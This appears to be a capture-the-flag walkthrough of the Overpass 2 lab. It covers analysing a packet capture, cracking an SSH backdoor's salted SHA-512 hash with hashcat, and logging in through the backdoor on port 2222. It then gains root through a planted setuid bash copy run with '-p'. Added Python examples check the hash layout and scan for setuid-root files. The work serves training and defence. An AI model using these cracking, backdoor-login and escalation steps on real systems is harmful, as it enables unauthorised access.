Overpass2

Overview

Overpass 2

Premise:

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.

Can you work out how the attacker got in, and hack your way back into Overpass' production server?

Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Learn Linux as a bare minimum.

md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc

PCAP file analysis using Wireshark

Filter http traffic

Follow the packet flow

Identify the attacker’s malicious activity

James's Password

Review the program at:

https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go

Save the hash and the salt in hash:salt format for cracking. hashid identifies the digest as SHA-512, and from the program source we already know that it uses a static salt. From hashcat's help page, the matching mode is 1710, sha512($pass.$salt).

root@kinetic:/dev/shm# hashcat -a 0 -m 1710 ./hashfile.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz, 2891/2955 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:XXXXXXXXXXXX

Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512($pass.$salt)
Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
Time.Started.....: Mon Sep 28 20:22:15 2020 (0 secs)
Time.Estimated...: Mon Sep 28 20:22:15 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   301.9 kH/s (0.56ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 18432/14344385 (0.13%)
Rejected.........: 0/18432 (0.00%)
Restore.Point....: 16384/14344385 (0.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: christal -> tanika

Started: Mon Sep 28 20:21:59 2020
Stopped: Mon Sep 28 20:22:17 2020
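Before spending time on a wordlist, it is worth confirming the hashcat mode by reproducing the program's hashing scheme on a value you control. The Python below is an added example, not the walkthrough's or the ssh-backdoor project's code: it builds the hash:salt line that modes 1710/1720 expect, tells sha512($pass.$salt) (1710) apart from sha512($salt.$pass) (1720) using a known test password, and shows why a static salt is weak, since identical digests then mean identical passwords. The sample salt and password are constructed; the only value taken from the page is the hash:salt pair from the hashcat run above, used here only to demonstrate parsing.

```python
import hashlib

# hashcat mode numbers for the two salted raw SHA-512 layouts (hashcat --help).
MODE_SHA512_PASS_SALT = 1710   # sha512($pass.$salt)
MODE_SHA512_SALT_PASS = 1720   # sha512($salt.$pass)

# The hash:salt line from the hashcat run in the walkthrough (digest and
# static salt only; the recovered password is deliberately not included).
WALKTHROUGH_LINE = (
    "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
    "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
    ":1c362db832f3f864c8c2fe05f2002a05"
)

# Constructed test values (hypothetical, not from the Overpass 2 box).
SAMPLE_SALT = "0123456789abcdef0123456789abcdef"
SAMPLE_PASSWORD = "correct-horse-battery"


def sha512_pass_salt(password, salt):
    """sha512($pass.$salt): the layout behind hashcat mode 1710."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def sha512_salt_pass(password, salt):
    """sha512($salt.$pass): the layout behind hashcat mode 1720."""
    return hashlib.sha512((salt + password).encode()).hexdigest()


def hashcat_line(digest_hex, salt):
    """Format a digest and its salt the way modes 1710/1720 expect them."""
    return f"{digest_hex}:{salt}"


def parse_hashcat_line(line):
    """Split hash:salt (or hashcat's hash:salt:plain output) into (digest, salt).

    Raises ValueError if the first field is not a 128-hex-character SHA-512
    digest, the quickest sanity check that a -m 17xx mode is even plausible.
    """
    fields = line.strip().split(":")
    if len(fields) < 2:
        raise ValueError("expected hash:salt")
    digest_hex, salt = fields[0].lower(), fields[1]
    if len(digest_hex) != 128 or any(c not in "0123456789abcdef" for c in digest_hex):
        raise ValueError("first field is not a SHA-512 hex digest")
    if not salt:
        raise ValueError("empty salt")
    return digest_hex, salt


def identify_mode(line, known_password):
    """Return the hashcat mode whose layout reproduces the digest for a
    password already known to be correct (for example one set on a test
    install of the same program), or None if neither layout matches."""
    digest_hex, salt = parse_hashcat_line(line)
    if sha512_pass_salt(known_password, salt) == digest_hex:
        return MODE_SHA512_PASS_SALT
    if sha512_salt_pass(known_password, salt) == digest_hex:
        return MODE_SHA512_SALT_PASS
    return None


def shared_password_groups(lines):
    """With a static salt, equal digests mean equal passwords: group the
    indexes of lines with identical digests so password reuse across
    accounts is visible without recovering any password."""
    groups = {}
    for i, line in enumerate(lines):
        digest_hex, _ = parse_hashcat_line(line)
        groups.setdefault(digest_hex, []).append(i)
    return [idx for idx in groups.values() if len(idx) > 1]


if __name__ == "__main__":
    line = hashcat_line(sha512_pass_salt(SAMPLE_PASSWORD, SAMPLE_SALT), SAMPLE_SALT)
    print("mode for constructed sample:", identify_mode(line, SAMPLE_PASSWORD))
    print("salt parsed from walkthrough line:", parse_hashcat_line(WALKTHROUGH_LINE)[1])
```

The `Hash.Name` field in the hashcat output above (`sha512($pass.$salt)`) is the same distinction `identify_mode` makes; if a program had prepended the salt instead, 1710 would never crack and 1720 would be the right choice.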

Backdoor

Note the port on which the SSH backdoor was installed (visible in the pcap); we already have the cracked password for james.

eneloop@kinetic:~$ ssh james@10.10.75.87 -p 2222
The authenticity of host '[10.10.75.87]:2222 ([10.10.75.87]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.75.87]:2222' (RSA) to the list of known hosts.
james@10.10.75.87's password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

james@overpass-production:/home/james/ssh-backdoor$ 
$ cd ~
james@overpass-production:/home/james$ cat user.txt 
thm{XXXXXXXXXXXXXXXXXXXXXXXXX}
james@overpass-production:/home/james$ 

$ ssh james@10.10.75.87 -p 2222
james@10.10.75.87's password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

There we have it! We can now use the root-owned setuid copy of bash (.suid_bash in james's home directory) to escalate privileges to root.

james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls -all
total 1136
drwxr-xr-x 7 james james    4096 Jul 22 03:40 .
drwxr-xr-x 7 root  root     4096 Jul 21 18:08 ..
lrwxrwxrwx 1 james james       9 Jul 21 18:14 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21 00:36 .cache
drwx------ 3 james james    4096 Sep 29 00:45 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22 03:35 .local
-rw------- 1 james james      51 Jul 21 17:45 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21 00:37 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22 02:57 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22 03:35 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22 03:40 user.txt
drwxrwxr-x 7 james james    4096 Jul 21 01:37 www

james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# cat /root/root.txt
thm{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
.suid_bash-4.4#
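From the defender's side, the artefact that made this escalation possible is a copy of bash in a home directory, owned by root with the setuid bit set. The Python below is an added example and not part of the walkthrough: it parses `ls -l` style listings (a constructed sample modelled on the listing above, with illustrative sizes and dates) to flag setuid-root regular files, and includes an os.lstat-based directory scan that applies the same check on a live system.

```python
import os
import stat

# Constructed sample in the format of `ls -all`, modelled on the listing of
# /home/james above; the extra owned_by_user entry is there to show that a
# setuid file not owned by root is not flagged.
SAMPLE_LISTING = """\
total 1136
drwxr-xr-x 7 james james    4096 Jul 22 03:40 .
drwxr-xr-x 7 root  root     4096 Jul 21 18:08 ..
lrwxrwxrwx 1 james james       9 Jul 21 18:14 .bash_history -> /dev/null
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
-rwsr-sr-x 1 root  root  1113504 Jul 22 02:57 .suid_bash
-rwsr-xr-x 1 james james   51200 Jul 22 02:58 owned_by_user
-rw-rw-r-- 1 james james      38 Jul 22 03:40 user.txt
"""


def parse_ls_line(line):
    """Parse one `ls -l` line into its fields; return None for the 'total'
    header or anything that does not look like a permission string."""
    parts = line.split(None, 8)
    if len(parts) < 9 or len(parts[0]) != 10 or parts[0][0] not in "-dlcbps":
        return None
    perms, _links, owner, group, size, _mon, _day, _time, name = parts
    name = name.split(" -> ", 1)[0]          # drop a symlink's target
    return {"perms": perms, "owner": owner, "group": group,
            "size": int(size) if size.isdigit() else None, "name": name}


def is_setuid(perms):
    """Owner-exec slot is 's' (setuid + exec) or 'S' (setuid without exec)."""
    return perms[3] in "sS"


def is_setgid(perms):
    """Group-exec slot is 's' or 'S' when the setgid bit is set."""
    return perms[6] in "sS"


def find_suid_root(listing):
    """Return regular files in the listing that are setuid and owned by root."""
    hits = []
    for line in listing.splitlines():
        entry = parse_ls_line(line)
        if entry is None or entry["perms"][0] != "-":
            continue                          # skip dirs, symlinks, devices
        if is_setuid(entry["perms"]) and entry["owner"] == "root":
            hits.append({"name": entry["name"], "owner": entry["owner"],
                         "setgid": is_setgid(entry["perms"])})
    return hits


def scan_tree_for_suid_root(root_dir):
    """Same check against a live filesystem. lstat is used so symlinks are
    not followed; equivalent to `find ROOT -type f -perm -4000 -user root`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for hit in find_suid_root(SAMPLE_LISTING):
        print("setuid-root file:", hit)
```

Running `scan_tree_for_suid_root("/home")` on a host where the only expected setuid-root binaries live under /usr gives a short, reviewable list; any hit there deserves a look. The `-p` in the walkthrough's `./.suid_bash -p` is also what makes such a copy worth finding: without it, bash notices that the effective and real user ids differ and drops the effective id back to the real one on startup.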